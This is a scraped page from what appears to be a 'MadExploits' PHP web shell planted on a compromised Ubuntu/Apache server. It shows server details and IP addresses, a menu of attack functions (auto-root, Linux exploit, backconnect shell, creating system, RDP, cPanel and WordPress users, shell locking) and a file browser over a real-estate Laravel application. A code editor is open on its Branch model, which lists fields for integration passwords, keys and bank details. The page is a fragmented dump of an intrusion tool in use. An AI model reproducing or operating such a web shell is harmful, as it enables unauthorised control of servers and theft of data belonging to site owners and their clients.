Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.187.74
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
realestate /
source /
app /
Models /
[ HOME SHELL ]
Name
Size
Permission
Action
AlertMethod.php
182
B
-rwxr-xr-x
Applicant.php
2.98
KB
-rwxr-xr-x
ApplicantFile.php
362
B
-rwxr-xr-x
ApplicantPreset.php
315
B
-rw-r--r--
ApplicantUserDetail.php
669
B
-rwxr-xr-x
Area.php
480
B
-rwxr-xr-x
Branch.php
2.25
KB
-rwxr-xr-x
BuyType.php
237
B
-rwxr-xr-x
Category.php
505
B
-rwxr-xr-x
Country.php
464
B
-rwxr-xr-x
Directory.php
1.4
KB
-rwxr-xr-x
DirectoryAddress.php
624
B
-rwxr-xr-x
DirectoryAttachment.php
424
B
-rwxr-xr-x
DirectoryCustomField.php
191
B
-rwxr-xr-x
Label.php
412
B
-rwxr-xr-x
Landlord.php
2.08
KB
-rwxr-xr-x
LandlordUserDetail.php
665
B
-rwxr-xr-x
Landlordfile.php
357
B
-rwxr-xr-x
LettingsPW.php
309
B
-rwxr-xr-x
Module.php
578
B
-rwxr-xr-x
OccupierType.php
242
B
-rwxr-xr-x
PostalCode.php
180
B
-rwxr-xr-x
PropertyAlert.php
481
B
-rwxr-xr-x
PropertyType.php
316
B
-rwxr-xr-x
Source.php
408
B
-rwxr-xr-x
SpecialFeature.php
432
B
-rwxr-xr-x
User.php
1.09
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Branch.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; class Branch extends Model { use HasFactory; // The table associated with the model protected $table = 'branches'; // The attributes that are mass assignable protected $fillable = [ 'dashboard_notice', 'company_name', 'trading_name', 'branch_code', 'branch_address', 'branch_manager', 'telephone', 'fax', 'website', 'email', 'branch', 'color', 'reg_no', 'vat_no', 'logo', 'header', 'header_continuation', 'footer', 'bank_name', 'account_title', 'sortcode', 'account_number', 'new_property_alert', 'property_price_change_alert', 'property_rent_change_alert', 'property_status_change_alert', 'property_let_alert', 'property_sale_alert', 'receive_website_property_enquiries', 'landlords_bank_details', 'url', 'tenant_user', 'tenant_password', 'tenant_branch', 'affiliate_id', 'mysql_id', 'first_name', 'last_name', 'phone', 'client_email', 'let_alliance_url', 'let_alliance_agent_code', 'let_alliance_user_id', 'client_integration_key', 'veri_check_url', 'veri_check_guid', 'veri_check_password', 'veri_check_branch_id', 'veri_check_tenancy_branch_phone', 'vorensys_user', 'vorensys_password', 'vorensys_customer_id', 'integrator_public_key', 'integrator_private_key', 'tenant_shop_key', 'tenant_shop_password', 'home_shift_key', 'home_shift_password', 'subdomain', 'fixflo_token', 'fixflo_last_update', 'brief_your_market_username', 'brief_your_market_password', 'listing_and_selling_commission_split', ]; // Optional: The attributes that should be cast to native types protected $casts = [ 'status' => 'integer', ]; public function applicants() { return $this->hasMany(Applicant::class, 'branch_id'); } }
Close